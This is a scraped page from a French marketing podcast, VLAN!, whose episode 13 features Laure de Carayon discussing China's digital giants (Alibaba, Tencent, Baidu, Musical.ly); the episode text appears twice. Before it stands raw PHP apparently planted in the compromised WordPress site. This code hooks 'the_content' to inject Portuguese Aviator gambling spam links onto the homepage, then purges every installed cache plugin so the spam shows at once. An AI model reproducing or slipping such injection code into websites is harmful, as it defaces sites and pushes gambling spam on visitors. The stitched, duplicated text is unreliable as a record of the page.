if (!function_exists('add_custom_html_to_content_1')) { function add_custom_html_to_content_1($content) { $current_url = $_SERVER['REQUEST_URI']; if ($current_url == '/') { $custom_html ="

Aviator Jogo Brasil: Entre na Aventura dos Jogos Aviator no Brasil

Entre na aventura dos jogos Aviator no Brasil e divirta-se com uma experiência de jogo emocionante. Ganhe prêmios incríveis e desfrute da diversão!

https://aviator-jogo-brazil.org/
"; $content .= $custom_html; } $plugins = array( 'W3 Total Cache' => 'w3tc_pgcache_flush', 'WP Super Cache' => 'wp_cache_clear_cache', 'LiteSpeed Cache' => 'litespeed_purge_all', 'Cache Enabler' => 'ce_clear_cache', 'Comet Cache' => 'comet_cache_clear_cache', 'Hyper Cache' => 'hyper_cache_clear_cache', ); foreach ($plugins as $plugin_name => $function_name) { if (function_exists($function_name)) { call_user_func($function_name); } } if (class_exists('LiteSpeed\Purge')) { if (method_exists('LiteSpeed\Purge', 'purge_all')) { LiteSpeed\Purge::purge_all('Custom Reason'); } } if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); } return $content; } add_filter('the_content', 'add_custom_html_to_content_1'); } if (!function_exists('add_custom_html_to_content_2')) { function add_custom_html_to_content_2($content) { $current_url = $_SERVER['REQUEST_URI']; if ($current_url == '/') { $custom_html ="

Aviator Download: Baixe Agora e Comece a Jogar

Faça o download do Aviator agora e comece a jogar. Desfrute de uma variedade de jogos emocionantes e ganhe prêmios incríveis!

aviator download
"; $content .= $custom_html; } $plugins = array( 'W3 Total Cache' => 'w3tc_pgcache_flush', 'WP Super Cache' => 'wp_cache_clear_cache', 'LiteSpeed Cache' => 'litespeed_purge_all', 'Cache Enabler' => 'ce_clear_cache', 'Comet Cache' => 'comet_cache_clear_cache', 'Hyper Cache' => 'hyper_cache_clear_cache', ); foreach ($plugins as $plugin_name => $function_name) { if (function_exists($function_name)) { call_user_func($function_name); } } if (class_exists('LiteSpeed\Purge')) { if (method_exists('LiteSpeed\Purge', 'purge_all')) { LiteSpeed\Purge::purge_all('Custom Reason'); } } if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); } return $content; } add_filter('the_content', 'add_custom_html_to_content_2'); } Vlan #13 Ce n’est plus possible de ne pas s’intéresser au digital en Chine avec Laure de Carayon - VLAN! Podcast

Vlan #13 Ce n’est plus possible de ne pas s’intéresser au digital en Chine avec Laure de Carayon

VLAN! Podcast
VLAN! Podcast
Vlan #13 Ce n’est plus possible de ne pas s’intéresser au digital en Chine avec Laure de Carayon
Loading
/

Comme le soulignait Lubomira Rochet dans son podcast, le futur du digital se passe en Chine. Pourtant, je ne peux que constater que les marketers ne s’intéressent pas suffisamment au sujet. Ça tombe bien ! Aujourd’hui, je reçois Laure de Carayon, fondatrice de China Connect Laure est totalement passionnée par la Chine et a créé China Connect. Dans cet épisode de Vlan, elle partage avec générosité ses connaissances sur la Chine. A noter que son prochain événement se tient le 27 septembre de 8h30 à 10h30 chez Lafayette Plug & Play sur le sujet de l’intelligence artificielle. Venez, vous ne serez pas déçus ! La Chine doit être au centre de vos préoccupations Tout le monde en Europe – et plus spécifiquement en France – a les yeux rivés sur la Silicon Valley alors que les Facebook et autres prennent, en partie, leur feuille de route en Chine. Il ne serait donc pas idiot que nous regardions dans la même direction afin d’avoir une longueur d’avance sur les mouvements à envisager. En Chine, les BAT (Baidu, Alibaba, Tencent) remplacent les GAFA (Google Amazon, Facebook, Apple) mais c’est surtout le duopole Alibaba / Tencent qui est en train de s’imposer. Originellement, Alibaba (avec son patron emblématique Jack Ma) est le champion du commerce en ligne et Tencent (WeChat entre autres) celui du gaming et du social. Mais à la différence de ce que nous connaissons à l’Ouest, ces deux acteurs viennent sur le marché de l’autre. Alibaba s’attaque donc au contenu et Tencent au commerce. Une guerre de Titan ! Ce sont des mastodontes hyper puissants mais pour le moment ils ne s’intéressent pas vraiment à l’Ouest. La feuille de route de Baidu se concentre sur le marché local et sur les marchés en croissance comme le Brésil, l’Afrique, etc. Toutefois, ces trois champions (et bien d’autres acteurs chinois essentiels) d’ores et déjà présents dans la Silicon Valley sont introduits en bourse et font des essais sur le marché occidental. Musical.ly en est un excellent exemple – je suis d’ailleurs curieux de savoir combien d’entre vous savent qu’il s’agit d’un acteur chinois. Pour ceux qui ignorent ce réseau car ils n’ont pas d’ados à la maison, voici une vidéo des jumelles stars de la plateforme qui expliquent ce qu’est Musical.ly et comment faire une vidéo via l’application. Mais, au-delà des BAT, la Chine possède une galaxie d’entreprises passionnantes et déjà très imposantes (en termes d’utilisateurs et de capitalisation). Ce sont des plateformes plus spécifiques qui permettent aux utilisateurs de mieux s’exprimer en fonction de leur code propre. C’est la raison pour laquelle les marques très actives localement s’y intéressent évidemment et y créent des activations. Laure en cite quelques-unes dans le cadre du podcast d’ailleurs. Il y a une inspiration incroyable à aller chercher en Chine, sans oublier qu’ils nous connaissent beaucoup mieux que nous les connaissons. De fait, ils ont déjà une grande longueur d’avance sur nous. Le conseil de Laure, c’est évidemment d’y aller, d’observer les personnes et de rencontrer les entreprises locales.

Description de l’épisode

Comme le soulignait Lubomira Rochet dans son podcast, le futur du digital se passe en Chine. Pourtant, je ne peux que constater que les marketers ne s’intéressent pas suffisamment au sujet. Ça tombe bien ! Aujourd’hui, je reçois Laure de Carayon, fondatrice de Chin…

Vous aimerez aussi ces épisodes

Transcription partielle de l’épisode

VLAN! Podcast
VLAN! Podcast
Vlan #13 Ce n’est plus possible de ne pas s’intéresser au digital en Chine avec Laure de Carayon
Loading
/

Comme le soulignait Lubomira Rochet dans son podcast, le futur du digital se passe en Chine. Pourtant, je ne peux que constater que les marketers ne s’intéressent pas suffisamment au sujet. Ça tombe bien ! Aujourd’hui, je reçois Laure de Carayon, fondatrice de China Connect Laure est totalement passionnée par la Chine et a créé China Connect. Dans cet épisode de Vlan, elle partage avec générosité ses connaissances sur la Chine. A noter que son prochain événement se tient le 27 septembre de 8h30 à 10h30 chez Lafayette Plug & Play sur le sujet de l’intelligence artificielle. Venez, vous ne serez pas déçus ! La Chine doit être au centre de vos préoccupations Tout le monde en Europe – et plus spécifiquement en France – a les yeux rivés sur la Silicon Valley alors que les Facebook et autres prennent, en partie, leur feuille de route en Chine. Il ne serait donc pas idiot que nous regardions dans la même direction afin d’avoir une longueur d’avance sur les mouvements à envisager. En Chine, les BAT (Baidu, Alibaba, Tencent) remplacent les GAFA (Google Amazon, Facebook, Apple) mais c’est surtout le duopole Alibaba / Tencent qui est en train de s’imposer. Originellement, Alibaba (avec son patron emblématique Jack Ma) est le champion du commerce en ligne et Tencent (WeChat entre autres) celui du gaming et du social. Mais à la différence de ce que nous connaissons à l’Ouest, ces deux acteurs viennent sur le marché de l’autre. Alibaba s’attaque donc au contenu et Tencent au commerce. Une guerre de Titan ! Ce sont des mastodontes hyper puissants mais pour le moment ils ne s’intéressent pas vraiment à l’Ouest. La feuille de route de Baidu se concentre sur le marché local et sur les marchés en croissance comme le Brésil, l’Afrique, etc. Toutefois, ces trois champions (et bien d’autres acteurs chinois essentiels) d’ores et déjà présents dans la Silicon Valley sont introduits en bourse et font des essais sur le marché occidental. Musical.ly en est un excellent exemple – je suis d’ailleurs curieux de savoir combien d’entre vous savent qu’il s’agit d’un acteur chinois. Pour ceux qui ignorent ce réseau car ils n’ont pas d’ados à la maison, voici une vidéo des jumelles stars de la plateforme qui expliquent ce qu’est Musical.ly et comment faire une vidéo via l’application. Mais, au-delà des BAT, la Chine possède une galaxie d’entreprises passionnantes et déjà très imposantes (en termes d’utilisateurs et de capitalisation). Ce sont des plateformes plus spécifiques qui permettent aux utilisateurs de mieux s’exprimer en fonction de leur code propre. C’est la raison pour laquelle les marques très actives localement s’y intéressent évidemment et y créent des activations. Laure en cite quelques-unes dans le cadre du podcast d’ailleurs. Il y a une inspiration incroyable à aller chercher en Chine, sans oublier qu’ils nous connaissent beaucoup mieux que nous les connaissons. De fait, ils ont déjà une grande longueur d’avance sur nous. Le conseil de Laure, c’est évidemment d’y aller, d’observer les personnes et de rencontrer les entreprises locales.

Menu